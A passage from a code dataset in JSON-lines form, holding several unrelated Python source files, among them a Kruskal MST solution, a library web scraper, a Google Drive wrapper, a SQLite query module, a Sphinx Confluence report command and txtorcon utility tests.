1)]\n ranks = [0 for i in range(V + 1)]\n\n\ndef find_set(u):\n if parent[u] != u:\n parent[u] = find_set(parent[u])\n return parent[u]\n\n\ndef union_set(u, v):\n up = find_set(u)\n vp = find_set(v)\n if up == vp:\n return\n if ranks[up] > ranks[vp]:\n parent[vp] = up\n elif ranks[up] < ranks[vp]:\n parent[up] = vp\n else:\n parent[up] = vp\n ranks[vp] += 1\n\n\ndef kruskal(number_of_cities):\n graph.sort(key=lambda _edge: (_edge.weight, _edge.source))\n i = 0\n while len(dist) != number_of_cities - 1:\n edge = graph[i]\n i += 1\n u = find_set(edge.source)\n v = find_set(edge.target)\n if u != v:\n dist.append(edge)\n union_set(u, v)\n\n\ndef print_MST():\n ans = 0\n for e in dist:\n source = chr(e.source + 65)\n target = chr(e.target + 65)\n print(\"{0}-{1} {2}\".format(source, target, e.weight))\n ans += e.weight\n\n\ndef solution():\n\n number_of_test_cases = int(input())\n\n for t in range(number_of_test_cases):\n global graph, dist\n graph = []\n dist = []\n number_of_cities = int(input())\n for i in range(number_of_cities):\n securities = input().split(', ')\n for j in range(i):\n security = int(securities[j])\n if security > 0:\n graph.append(Triad(j, i, security))\n make_set(number_of_cities)\n kruskal(number_of_cities)\n print('Case {0}:'.format(t + 1))\n print_MST()\n\n\nsolution()\n","sub_path":"Blue/Session 19 - Kruskal/UVA_1208.py","file_name":"UVA_1208.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"650088593","text":"import subprocess\nfrom contextlib import contextmanager\n\n@contextmanager\ndef jep_pipe(argv):\n \"\"\"\n Launches a separate process to run a test. This can be called from a\n unittest method.\n \n Primary use cases:\n 1. Testing that the JVM does not crash when interpreting specific\n Python statements. We do not want to crash the current jep process\n that is running the unit tests.\n 2. Testing launching a Java main() process that sets up its own\n Jep instance for testing specific behavior.\n \n This will return the stdout of the separate process. Therefore the\n separate process should print out expected output. When asserting the\n output equals what is expected, the assert will need a trailing \\n.\n\n Args:\n argv: a list of command line arguments to launch the process,\n i.e. subprocess.Popen(argv)\n example: ['jep', 'tests/some_python_file.py']\n\n Returns:\n the stdout of the process\n \"\"\"\n\n try:\n p = subprocess.Popen(argv, stdout=subprocess.PIPE)\n yield(line.decode('utf-8') for line in p.stdout)\n finally:\n p.kill()\n","sub_path":"tests/jep_pipe.py","file_name":"jep_pipe.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"472088231","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCreated on Mon Mar 12 21:03:12 2018\n\n@author: Mingren Shen\n\nThis python program get data of all \"Data Science\" books form libraray of UIUC\n\n\n\"\"\"\n\n#import needed package\nfrom bs4 import BeautifulSoup as bs\nimport pandas as pd\nimport requests\n#import pickle\n\ndef collectBookURL(webpage,result_dict):\n for a in webpage.findAll(\"a\", {\"class\": \"title\"}):\n # key is URL and content is title\n # in case Book with same title\n result_dict[a['href']] = a.get_text().replace('/',\"\")\n \ndef parseBookDetailPage(pageURL,pandasDF,rowIndex):\n tmp_r = requests.get(pageURL)\n tmp_soup = bs(tmp_r.text,\"lxml\")\n tableList = tmp_soup.find_all('table')\n #print(len(tableList))\n Info_table = tableList[2]\n ISBN_table = tableList[3]\n InfoSummary = dictify(Info_table)\n # Processing general Infomation Table\n for key,val in InfoSummary.items():\n if ( key in pandasDF.columns):\n pandasDF.at[rowIndex, key]= val\n else:\n print(\"===Error Uncaught record field in Table 1: \" + key)\n pandasDF.at[rowIndex, key]= val\n # Processing ISBN Table\n ISBNSummary = dictify(ISBN_table)\n for key,val in ISBNSummary.items():\n if ( key in pandasDF.columns):\n pandasDF.at[rowIndex, key]= val\n else:\n print(\"===Error Uncaught record field in Table 2 : \" + key)\n pandasDF.at[rowIndex, key]= val\n\n\n# dictify all the elements of HTML Table\ndef dictify(tableHTML):\n result_dict = dict()\n for table_rows in tableHTML.select(\"tr\"):\n content = table_rows.text.split(':')\n result_dict[content[0].strip()] = content[1].strip()\n return result_dict\n\n \n\nif __name__ == \"__main__\":\n \"\"\"\n method description :\n 1.get the search result from UW-Madison's library\n 2.get basic data\n 3.collect all URL for the books\n\n \"\"\"\n print(\"================The Start=========================\")\n\n # 20 Books per page, so 500 pages give 10000 Books.\n #print(\"We only need first 10000 Books in the searching results.\")\n # dictory to store URL for the details pages of Book\n dict_BookDetailsURL = dict()\n # Rotate to get all URL of Books\n preURL = 'https://vufind.carli.illinois.edu/vf-uiu/Search/Home?type%5B%5D=&lookfor%5B%5D=Data%20Science&bool%5B%5D=AND&type%5B%5D=title&lookfor%5B%5D=&bool%5B%5D=AND&type%5B%5D=author&lookfor%5B%5D=&start_over=1&specDate=&version=any&gPub=&page='\n #postURL = '&q=Data+Science'\n # 10 Books per page, so 1000 pages give 10000 Books.\n print(\"We only need first 10000 Books in the searching results.\")\n MAX_PAGES = 501\n for i in range(1,MAX_PAGES):\n if ( i % 50 == 0):\n print(\"Processing Page \" + str(i))\n tmp_URL = preURL + str(i)\n tmp_r = requests.get(tmp_URL)\n tmp_soup = bs(tmp_r.text,\"lxml\")\n collectBookURL(tmp_soup,dict_BookDetailsURL)\n\n # set up DataFrame to store the data\n df = pd.DataFrame(columns=['ID','TITLE','Author','Other Names','Published','Topics','Genres','Tags','ISBN'])\n \n # Processing the detailed page of each book\n keyID = 0\n for key,value in dict_BookDetailsURL.items():\n itemURL = 'https://vufind.carli.illinois.edu' + key + '/Description'\n parseBookDetailPage(itemURL,df,keyID)\n df.at[keyID,'ID'] = keyID\n df.at[keyID,'TITLE'] = value\n if (keyID % 500 == 0):\n print (\"Now processing Book \" + str(keyID))\n keyID = keyID + 1\n #print(itemURL)\n df.to_csv(\"BOOKS_UIUC.csv\",sep = '\\t',index = False, encoding='utf-8')\n print(\"================The End===========================\")\n ","sub_path":"stage2/code/webcrawl_UIUC.py","file_name":"webcrawl_UIUC.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"66376063","text":"import warnings\nfrom typing import Optional, Union\n\nfrom pygsuite import Clients\nfrom pygsuite.drive.folder import Folder\nfrom pygsuite.drive.query import Operator, QueryString, QueryStringGroup, QueryTerm\nfrom pygsuite.enums import MimeType\n\n\nDRIVE_V3_API_URL = \"https://www.googleapis.com/drive/v3/files\"\n\n\ndef default_callback(request_id, response, exception):\n if exception:\n # Handle error\n raise ValueError(exception)\n\n\nclass Drive:\n \"\"\"Due for deprecation, please use File and Folder to search and create objects.\"\"\"\n\n def __init__(self, client=None):\n client = client or Clients.drive_client_v3\n self.service = client\n\n # warn users about deprecation\n warnings.warn((\n \"This object and its methods will be deprecated soon.\"\n \"Please consider using a drive.File or drive.Folder object instead\"\n ), DeprecationWarning)\n\n def _find_files(self, type: MimeType, name: Optional[str] = None):\n q = f'mimeType=\"{type}\"'\n if name:\n q += f' and name = \"{name}\"'\n base = self.service.files().list(q=q).execute()\n files = base.get(\"files\")\n page_token = base.get(\"nextPageToken\")\n while page_token is not None:\n base = self.service.files().list(q=q, page_token=page_token).execute()\n files += base.get(\"files\")\n page_token = base.get(\"nextPageToken\")\n return files\n\n def find_files(\n self,\n folder_id: Optional[str] = None,\n name: Optional[str] = None,\n exact_match: bool = True,\n type: Optional[Union[MimeType, str]] = None,\n extra_conditions: Optional[Union[QueryString, QueryStringGroup]] = None,\n support_all_drives: bool = False,\n ):\n \"\"\"Find matching files given certain criteria.\n\n Args:\n folder_id (str): The folder ID to search within. If none is provided, a recursive search of all folders is performed.\n name (str): The case-sensitive name of the file to search for.\n exact_match (bool): Whether to only match the given name exactly, or return any name containing the string.\n type (Union[MimeType, str]): A specific Google Docs type to match.\n extra_conditions (Union[QueryString, QueryStringGroup]): Any additional queries to pass to the files search.\n support_all_drives (bool): Whether the requesting application supports both My Drives and shared drives.\n \"\"\"\n query = None\n\n # name match query\n if name:\n operator = Operator.EQUAL if exact_match else Operator.CONTAINS\n name_query = QueryString(QueryTerm.NAME, operator, name)\n query = name_query\n\n # optional type query\n if type:\n mimetype = str(type) if isinstance(type, MimeType) else type\n type_query = QueryString(QueryTerm.MIMETYPE, Operator.EQUAL, mimetype)\n query = QueryStringGroup([query, type_query]) if query else type_query\n\n # optional auxillary query\n if extra_conditions:\n query = QueryStringGroup([query, extra_conditions]) if query else extra_conditions\n\n folder = Folder(id=folder_id, client=self.service)\n files = folder.get_files(extra_conditions=query, support_all_drives=support_all_drives)\n\n return files\n\n def copy_file(self, file_id, title: str, folder_id: str):\n body = {\"name\": title, \"parents\": [folder_id]}\n response = self.service.files().copy(fileId=file_id, body=body).execute()\n return response\n","sub_path":"pygsuite/drive/drive.py","file_name":"drive.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"216041112","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 16 09:36:57 2020\r\n\r\nThis script splits a .pdb file containing many structures, giving each structure its own .pdb file. Only alpha carbons are carried over.\r\n\r\n@author: Victor Prieto\r\n\r\n\"\"\"\r\n\r\n''# -*- coding: utf-8 -*-\r\n\r\n\r\n#starts program runtime\r\nimport time\r\nstart_time = time.time()\r\n\r\nimport tkinter\r\nroot = tkinter.Tk()\r\nroot.withdraw()\r\n\r\n#create list of filenames\r\nfilename_list = []\r\n\r\nfor i in range(1, 20):\r\n filename = 'N_' + \"{:03d}\".format(i) + '_campari_traj.pdb'\r\n filename_list.append(filename)\r\n \r\n#Place the file requested into an array.\r\nfile = open('N_001_campari_traj.pdb')\r\n\r\nmodel = []\r\n\r\ncount = 0\r\n\r\nfor filename in filename_list:\r\n file = open(filename)\r\n for line in file:\r\n if line.startswith('CRYST'):\r\n count += 1\r\n if count % 100 == 0:\r\n print ('\\nnumber of processed models: ', str(count), '\\n') \r\n count_string = str(count)\r\n output_file_name = filename[3:6] + count_string.zfill(6) + '.pdb'\r\n output_file = open(output_file_name, 'w')\r\n output_file.write(line)\r\n if line.startswith('TITLE'):\r\n output_file.write(line)\r\n if line.startswith('MODEL'):\r\n output_file.write(line)\r\n if line.startswith('ATOM') and line[13:15] == 'CA':\r\n output_file.write(line)\r\n if line.startswith('ENDMDL'):\r\n output_file.write('ENDMDL\\n')\r\n output_file.close()\r\n if count == 10000:\r\n break\r\n else:\r\n None\r\n\r\n#prints runtime\r\nprint(\"--- %s seconds ---\" % (time.time() - start_time)) ","sub_path":"trajectory_training_set/PDB splitter alpha carbon master.py","file_name":"PDB splitter alpha carbon master.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"595046533","text":"# Testing for python database server\r\n#\r\n# This file wil eventually contain all functions relating to accessing the DB\r\n# This makes it easier to test offline without working on the server at all times\r\n#\r\n# Current Functions:\r\n#\r\n# create_connection(db) - Creates connection to SQLlite3 database stored in the same folder\r\n#\r\n# Version 1.1 by Nathan Graves\r\n\r\nimport sqlite3 as sql\r\nimport cgi\r\nimport sys\r\nimport json\r\n\r\n#\r\n# BASIC SETUP FUNCTIONS\r\n#\r\n\r\ndef JS_Intake():\r\n\r\n\r\n return \"result\"\r\n#end JS_Intake\r\n\r\n\r\ndef DB_NAME(): #Clean? no, but it works. Allows for easy modification of accessed DB\r\n return \"FooDBv3.db3\"\r\n#end DB_NAME()\r\n\r\ndef create_connection(db):\r\n\r\n \"\"\"Creates a connection to the specified database\r\n Returns conn, a connection object, or nothing if connection fails\r\n \"\"\"\r\n\r\n try:\r\n conn = sql.connect(db)\r\n return conn\r\n print(sql.version)\r\n except Error as e:\r\n print(e)\r\n\r\n return\r\n#end create_connection\r\n\r\n#\r\n# BASIC QUERYING FUNCTIONS\r\n#\r\n\r\ndef exactMatch(item):\r\n \"\"\"Function queries database for an exact match of the item and returns all data\"\"\"\r\n #create connection and cursor\r\n conn = create_connection(DB_NAME());\r\n cur = conn.cursor();\r\n\r\n #make statement string\r\n sqlStatement = \"SELECT * FROM parsedFood WHERE searchString=?\";\r\n\r\n #execute query\r\n cur.execute(sqlStatement, (item,));\r\n match = cur.fetchall()\r\n\r\n #close connection and return result\r\n conn.close();\r\n return match\r\n#end exactMatch()\r\n\r\ndef customQuery(queryString):\r\n \"\"\" Function submits custom query to databse and returns whatever results from that\"\"\"\r\n #create connection and cursor\r\n conn = create_connection(DB_NAME());\r\n cur = conn.cursor();\r\n\r\n #execute query\r\n cur.execute(queryString);\r\n queryResult = cur.fetchall();\r\n\r\n #close connection and return result\r\n conn.close();\r\n return queryResult\r\n#end customQuery\r\n\r\ndef fdcIDbasicSearch(id):\r\n \"\"\" Function submits a search to the database based on FDC_ID, an integer\"\"\"\r\n #create connection and cursor\r\n conn = create_connection(DB_NAME());\r\n cur = conn.cursor();\r\n\r\n #create SQL Statement\r\n sqlStatement = \"SELECT * FROM parsedFood WHERE fdcID=?\";\r\n\r\n #execute query\r\n cur.execute(sqlStatement,(id,));\r\n idSearchResult = cur.fetchall();\r\n\r\n #close connection and return result\r\n conn.close();\r\n return idSearchResult\r\n#end fdcIDbasicSearch\r\n\r\ndef fdcIDnutritionSearch(id):\r\n \"\"\" Function submits a search to the database based on FDC_ID, an integer\"\"\"\r\n #create connection and cursor\r\n conn = create_connection(DB_NAME());\r\n cur = conn.cursor();\r\n\r\n #create SQL Statement\r\n sqlStatement = '''SELECT * FROM nutValues WHERE FDC_ID=? \r\n\t\t UNION\r\n\t\t SELECT * FROM nutUnits WHERE FDC_ID=?''';\r\n\r\n #execute query\r\n cur.execute(sqlStatement,(id,id));\r\n idSearchResult = cur.fetchall();\r\n\r\n #close connection and return result\r\n conn.close();\r\n return idSearchResult\r\n#end fdcIDnutritionSearch\r\n\r\n#\r\n# SPECIALIZED QUERYING FUNCTIONS\r\n#\r\n\r\ndef closeMatch(searchString):\r\n \"\"\" Function submits a search to the database based on searchString\"\"\"\r\n #create connection and cursor\r\n conn = create_connection(DB_NAME());\r\n cur = conn.cursor();\r\n\r\n #create SQL Statement\r\n sqlStatement = \"\"\"SELECT foodDescription,fdcID FROM parsedFood WHERE searchString LIKE ?\r\n ORDER BY (CASE WHEN searchString = ? THEN 1 WHEN searchString LIKE ? THEN 2 ELSE 3 END)\r\n \"\"\";\r\n\r\n #execute query\r\n cur.execute(sqlStatement,('%'+searchString+'%',searchString,searchString+'%'));\r\n table = cur.fetchmany(50);\r\n\r\n #close connection and return result\r\n conn.close();\r\n return table\r\n#end closeMatch\r\n\r\ndef rand3():\r\n \"\"\" Selects Three Random Rows\"\"\"\r\n #create connection and cursor\r\n conn = create_connection(DB_NAME());\r\n cur = conn.cursor();\r\n\r\n #create SQL Statement\r\n sqlStatement = \"SELECT foodDescription,fdcID FROM parsedFood ORDER BY random() LIMIT 3\";\r\n\r\n #execute query\r\n cur.execute(sqlStatement);\r\n table = cur.fetchall();\r\n\r\n #close connection and return result\r\n conn.close();\r\n return table\r\n#end rand3\r\n\r\n#end PythonTest\r\n","sub_path":"html/cgi-bin/FooDB.py","file_name":"FooDB.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"625572226","text":"# -*- coding: utf-8 -*-\n\"\"\"\n:copyright: Copyright 2020 Sphinx Confluence Builder Contributors (AUTHORS)\n:license: BSD-2-Clause (LICENSE)\n\"\"\"\n\nfrom collections import OrderedDict\nfrom requests import __version__ as requests_version\nfrom sphinx import __version__ as sphinx_version\nfrom sphinx.application import Sphinx\nfrom sphinx.util.docutils import docutils_namespace\nfrom sphinxcontrib.confluencebuilder import __version__ as scb_version\nfrom sphinxcontrib.confluencebuilder.config import process_ask_configs\nfrom sphinxcontrib.confluencebuilder.logger import ConfluenceLogger as logger\nfrom sphinxcontrib.confluencebuilder.publisher import ConfluencePublisher\nfrom sphinxcontrib.confluencebuilder.reportbuilder import ConfluenceReportBuilder\nfrom sphinxcontrib.confluencebuilder.util import ConfluenceUtil\nfrom tempfile import TemporaryDirectory\nfrom xml.etree import ElementTree\nimport os\nimport platform\nimport sys\n\ntry:\n from urllib.parse import urlparse\nexcept NameError:\n from urlparse import urlparse\n\n#: rest point to fetch instance manifest state\nMANIFEST_PATH = 'rest/applinks/1.0/manifest'\n\n#: prefixes for builder-specific configurations to always be sanitized\nIGNORE_BUILDER_CONFS = (\n 'applehelp_',\n 'devhelp_',\n 'epub_',\n 'html_',\n 'htmlhelp_',\n 'latex_',\n 'man_',\n 'qthelp_',\n 'texinfo_',\n 'text_',\n 'xml_',\n)\n\ndef report_main(args_parser):\n \"\"\"\n report mainline\n\n The mainline for the 'report' action.\n\n Args:\n args_parser: the argument parser to use for argument processing\n\n Returns:\n the exit code\n \"\"\"\n\n args_parser.add_argument('--full-config', '-C', action='store_true')\n args_parser.add_argument('--no-sanitize', action='store_true')\n args_parser.add_argument('--offline', action='store_true')\n\n known_args = sys.argv[1:]\n args, unknown_args = args_parser.parse_known_args(known_args)\n if unknown_args:\n logger.warn('unknown arguments: {}'.format(' '.join(unknown_args)))\n\n rv = 0\n work_dir = args.work_dir if args.work_dir else os.getcwd()\n\n # setup sphinx engine to extract configuration\n config = {}\n configuration_load_issue = None\n confluence_instance_info = None\n publisher = ConfluencePublisher()\n\n try:\n with TemporaryDirectory() as tmp_dir:\n with docutils_namespace():\n print('fetching configuration information...')\n app = Sphinx(\n work_dir, # document sources\n work_dir, # directory with configuration\n tmp_dir, # output for built documents\n tmp_dir, # output for doctree files\n ConfluenceReportBuilder.name) # builder to execute\n\n if app.config.confluence_publish:\n process_ask_configs(app.config)\n\n # extract configuration information\n for k, v in app.config.values.items():\n raw = getattr(app.config, k)\n if raw is None:\n continue\n\n if callable(raw):\n value = '(callable)'\n else:\n value = raw\n\n if not args.full_config and not k.startswith('confluence_'):\n continue\n\n # always extract some known builder configurations\n if args.full_config and k.startswith(IGNORE_BUILDER_CONFS):\n continue\n\n config[k] = value\n\n # initialize the publisher (if needed later)\n publisher.init(app.config)\n\n except Exception as ex:\n logger.error(ex)\n if os.path.isfile(os.path.join(work_dir, 'conf.py')):\n configuration_load_issue = 'unable to load configuration'\n else:\n configuration_load_issue = 'no documentation/missing configuration'\n rv = 1\n\n # attempt to fetch confluence instance version\n confluence_publish = config.get('confluence_publish')\n confluence_server_url = config.get('confluence_server_url')\n if not args.offline and confluence_publish and confluence_server_url:\n base_url = ConfluenceUtil.normalizeBaseUrl(confluence_server_url)\n info = ''\n\n session = None\n try:\n print('connecting to confluence instance...')\n publisher.connect()\n info += ' connected: yes\\n'\n session = publisher.rest_client.session\n except Exception as ex:\n logger.error(ex)\n info += ' connected: no\\n'\n rv = 1\n\n if session:\n try:\n # fetch\n print('fetching confluence instance information...')\n manifest_url = base_url + MANIFEST_PATH\n rsp = session.get(manifest_url)\n\n if rsp.status_code == 200:\n info += ' fetched: yes\\n'\n\n # extract\n print('decoding information...')\n rsp.encoding = 'utf-8'\n raw_data = rsp.text\n info += ' decoded: yes\\n'\n\n # parse\n print('parsing information...')\n xml_data = ElementTree.fromstring(raw_data)\n info += ' parsed: yes\\n'\n root = ElementTree.ElementTree(xml_data)\n for o in root.findall('typeId'):\n info += ' type: ' + o.text + '\\n'\n for o in root.findall('version'):\n info += ' version: ' + o.text + '\\n'\n for o in root.findall('buildNumber'):\n info += ' build: ' + o.text + '\\n'\n else:\n logger.error('bad response from server ({})'.format(\n rsp.status_code))\n info += ' fetched: error ({})\\n'.format(rsp.status_code)\n rv = 1\n except Exception as ex:\n logger.error(ex)\n info += 'failure to determine confluence data\\n'\n rv = 1\n\n confluence_instance_info = info\n\n def sensitive_config(key):\n if key in config:\n config[key] = '(set)'\n\n # always sanitize out sensitive information\n sensitive_config('confluence_client_cert_pass')\n sensitive_config('confluence_server_pass')\n\n # optional sanitization\n if not args.no_sanitize:\n sensitive_config('author')\n sensitive_config('confluence_client_cert')\n sensitive_config('confluence_global_labels')\n sensitive_config('confluence_jira_servers')\n sensitive_config('confluence_parent_page')\n sensitive_config('confluence_parent_page_id_check')\n sensitive_config('confluence_proxy')\n sensitive_config('confluence_server_auth')\n sensitive_config('confluence_server_cookies')\n sensitive_config('confluence_server_user')\n sensitive_config('project')\n\n # remove confluence instance (attempt to keep scheme)\n if 'confluence_server_url' in config:\n value = config['confluence_server_url']\n parsed = urlparse(value)\n\n if parsed.scheme:\n value = parsed.scheme + '://'\n else:\n value = '(set; no scheme)'\n\n if parsed.netloc and parsed.netloc.endswith('atlassian.net'):\n value += ' (cloud)'\n\n config['confluence_server_url'] = value\n\n # remove space name, but track casing\n if 'confluence_space_name' in config:\n value = config['confluence_space_name']\n if value.isupper():\n value = '(set; upper)'\n elif value.islower():\n value = '(set; upper)'\n else:\n value = '(set; mixed)'\n config['confluence_space_name'] = value\n\n print('')\n print('Confluence builder report has been generated.')\n print('Please copy the following text for the GitHub issue:')\n print('')\n logger.note('------------[ cut here ]------------')\n print('(system)')\n print(' platform:', single_line_version(platform.platform()))\n print(' python:', single_line_version(sys.version))\n print(' sphinx:', single_line_version(sphinx_version))\n print(' requests:', single_line_version(requests_version))\n print(' builder:', single_line_version(scb_version))\n\n print('')\n print('(configuration)')\n if config:\n for k, v in OrderedDict(sorted(config.items())).items():\n print('{}: {}'.format(k, v))\n else:\n print('~default configuration~')\n\n if configuration_load_issue:\n print('')\n print('(error loading configuration)')\n print(configuration_load_issue)\n\n if confluence_instance_info:\n print('')\n print('(confluence instance)')\n print(confluence_instance_info.rstrip())\n\n logger.note('------------[ cut here ]------------')\n\n return rv\n\ndef single_line_version(value):\n \"\"\"\n ensure a version value is represented in a single string\n\n When processing version entries, the output may attempt to print out\n multiple lines. This call helps join the multiple lines together.\n\n Args:\n value: the value to extract a version from\n\n Returns:\n the single-line version string\n \"\"\"\n return ' '.join(str(value).split())\n","sub_path":"sphinxcontrib/confluencebuilder/cmd/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":9554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"590972420","text":"from mock import patch\nfrom twisted.trial import unittest\nfrom twisted.internet import defer\nfrom twisted.internet.endpoints import TCP4ServerEndpoint\nfrom twisted.internet.interfaces import IProtocolFactory\nfrom zope.interface import implements\n\nfrom txtorcon.util import process_from_address, delete_file_or_tree, find_keywords, ip_from_int, find_tor_binary, maybe_ip_addr\n\nimport os\nimport tempfile\n\n\nclass FakeState:\n tor_pid = 0\n\n\nclass FakeProtocolFactory:\n implements(IProtocolFactory)\n\n def doStart(self):\n \"IProtocolFactory API\"\n\n def doStop(self):\n \"IProtocolFactory API\"\n\n def buildProtocol(self, addr):\n \"IProtocolFactory API\"\n return None\n\n\nclass TestIPFromInt(unittest.TestCase):\n\n def test_cast(self):\n self.assertEqual(ip_from_int(0x7f000001), '127.0.0.1')\n\n\nclass TestGeoIpDatabaseLoading(unittest.TestCase):\n\n def test_bad_geoip_path(self):\n \"fail gracefully if a db is missing\"\n from txtorcon import util\n self.assertRaises(IOError, util.create_geoip, '_missing_path_')\n\n\nclass TestFindKeywords(unittest.TestCase):\n\n def test_filter(self):\n \"make sure we filter out keys that look like router IDs\"\n self.assertEqual(find_keywords(\"foo=bar $1234567890=routername baz=quux\".split()),\n {'foo': 'bar', 'baz': 'quux'})\n\n\nclass FakeGeoIP(object):\n def __init__(self, version=2):\n self.version = version\n\n def record_by_addr(self, ip):\n r = dict(country_code='XX',\n latitude=50.0,\n longitude=0.0,\n city='City')\n if self.version == 2:\n r['region_code'] = 'Region'\n else:\n r['region_name'] = 'Region'\n return r\n\n\nclass TestNetLocation(unittest.TestCase):\n\n def test_valid_lookup_v2(self):\n from txtorcon import util\n orig = util.city\n try:\n util.city = FakeGeoIP(version=2)\n nl = util.NetLocation('127.0.0.1')\n self.assertTrue(nl.city)\n self.assertEquals(nl.city[0], 'City')\n self.assertEquals(nl.city[1], 'Region')\n finally:\n util.ity = orig\n\n def test_valid_lookup_v3(self):\n from txtorcon import util\n orig = util.city\n try:\n util.city = FakeGeoIP(version=3)\n nl = util.NetLocation('127.0.0.1')\n self.assertTrue(nl.city)\n self.assertEquals(nl.city[0], 'City')\n self.assertEquals(nl.city[1], 'Region')\n finally:\n util.ity = orig\n\n def test_city_fails(self):\n \"make sure we don't fail if the city lookup excepts\"\n from txtorcon import util\n orig = util.city\n try:\n class Thrower(object):\n def record_by_addr(*args, **kw):\n raise RuntimeError(\"testing failure\")\n util.city = Thrower()\n nl = util.NetLocation('127.0.0.1')\n self.assertEqual(None, nl.city)\n\n finally:\n util.city = orig\n\n def test_no_city_db(self):\n \"ensure we lookup from country if we have no city\"\n from txtorcon import util\n origcity = util.city\n origcountry = util.country\n try:\n util.city = None\n obj = object()\n\n class CountryCoder(object):\n def country_code_by_addr(self, ipaddr):\n return obj\n util.country = CountryCoder()\n nl = util.NetLocation('127.0.0.1')\n self.assertEqual(obj, nl.countrycode)\n\n finally:\n util.city = origcity\n util.country = origcountry\n\n def test_no_city_or_country_db(self):\n \"ensure we lookup from asn if we have no city or country\"\n from txtorcon import util\n origcity = util.city\n origcountry = util.country\n origasn = util.asn\n try:\n util.city = None\n util.country = None\n\n class Thrower:\n def org_by_addr(*args, **kw):\n raise RuntimeError(\"testing failure\")\n util.asn = Thrower()\n nl = util.NetLocation('127.0.0.1')\n self.assertEqual('', nl.countrycode)\n\n finally:\n util.city = origcity\n util.country = origcountry\n util.asn = origasn\n\n\nclass TestProcessFromUtil(unittest.TestCase):\n\n def setUp(self):\n self.fakestate = FakeState()\n\n def test_none(self):\n \"ensure we do something useful on a None address\"\n self.assertEqual(process_from_address(None, 80, self.fakestate), None)\n\n def test_internal(self):\n \"look up the (Tor_internal) PID\"\n pfa = process_from_address('(Tor_internal)', 80, self.fakestate)\n # depends on whether you have psutil installed or not, and on\n # whether your system always has a PID 0 process...\n self.assertEqual(pfa, self.fakestate.tor_pid)\n\n def test_internal_no_state(self):\n \"look up the (Tor_internal) PID\"\n pfa = process_from_address('(Tor_internal)', 80)\n # depends on whether you have psutil installed or not, and on\n # whether your system always has a PID 0 process...\n self.assertEqual(pfa, None)\n\n @defer.inlineCallbacks\n def test_real_addr(self):\n ## FIXME should choose a port which definitely isn't used.\n\n ## it's apparently frowned upon to use the \"real\" reactor in\n ## tests, but I was using \"nc\" before, and I think this is\n ## preferable.\n from twisted.internet import reactor\n listener = yield TCP4ServerEndpoint(reactor, 9887).listen(FakeProtocolFactory())\n\n try:\n pid = process_from_address('0.0.0.0', 9887, self.fakestate)\n finally:\n listener.stopListening()\n\n self.assertEqual(pid, os.getpid())\n\n\nclass TestDelete(unittest.TestCase):\n\n def test_delete_file(self):\n (fd, f) = tempfile.mkstemp()\n os.write(fd, 'some\\ndata\\n')\n os.close(fd)\n self.assertTrue(os.path.exists(f))\n delete_file_or_tree(f)\n self.assertTrue(not os.path.exists(f))\n\n def test_delete_tree(self):\n d = tempfile.mkdtemp()\n f = open(os.path.join(d, 'foo'), 'w')\n f.write('foo\\n')\n f.close()\n\n self.assertTrue(os.path.exists(d))\n self.assertTrue(os.path.isdir(d))\n self.assertTrue(os.path.exists(os.path.join(d, 'foo')))\n\n delete_file_or_tree(d)\n\n self.assertTrue(not os.path.exists(d))\n self.assertTrue(not os.path.exists(os.path.join(d, 'foo')))\n\n\nclass TestFindTor(unittest.TestCase):\n\n def test_simple_find_tor(self):\n ## just test that this doesn't raise an exception\n find_tor_binary()\n\n def test_find_tor_globs(self):\n \"test searching by globs\"\n find_tor_binary(system_tor=False)\n\n def test_find_tor_unfound(self):\n \"test searching by globs\"\n self.assertEqual(None, find_tor_binary(system_tor=False, globs=()))\n\n @patch('txtorcon.util.subprocess.Popen')\n def test_find_ioerror(self, popen):\n \"test searching with which, but it fails\"\n popen.side_effect = OSError\n self.assertEqual(None, find_tor_binary(system_tor=True, globs=()))\n\n\nclass TestIpAddr(unittest.TestCase):\n\n @patch('txtorcon.util.ipaddr')\n def test_create_ipaddr(self, ipaddr):\n ip = maybe_ip_addr('1.2.3.4')\n\n @patch('txtorcon.util.ipaddr')\n def test_create_ipaddr(self, ipaddr):\n def foo(blam):\n raise ValueError('testing')\n ipaddr.IPAddress.side_effect = foo\n ip = maybe_ip_addr('1.2.3.4')\n","sub_path":"test/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":7636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"518248963","text":"#!/usr/bin/env python\n\nimport smbus\nimport time\n\n# Set the bus as I2C bus 0\nbus = smbus.SMBus(0)\n\n# This is the address we setup in the Arduino Sketch\naddress = 0x0a\n\ndef setPixel(x, y, r, g, b):\n bus.write_block_data(address, 0, [x, y, r, g, b]);\n\nwhile True:\n x = int(input('X-Coordinate: '))\n y = int(input('Y-Coordinate: '))\n r = int(input('Red: '))\n g = int(input('Green: '))\n b = int(input('Blue: '))\n setPixel(x, y, r, g, b)\n print\n","sub_path":"neopixel/omega.py","file_name":"omega.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"165177061","text":"\"\"\"\"\"\na = 10\nb = 25\nc = 66\n\nx = int(input(\"Digite um número: \"))\n\nif(x == a) or (x == b) or (x == c):\n print(\"Está contido\")\nelse:\n print(\"Não está contido\")\n\nprint(\"===utilizando Operadores IN\")\n\nr = 10\ny = 25\nt = 66\n\nl = int(input(\"Digite um número: \"))\n\nif(l in 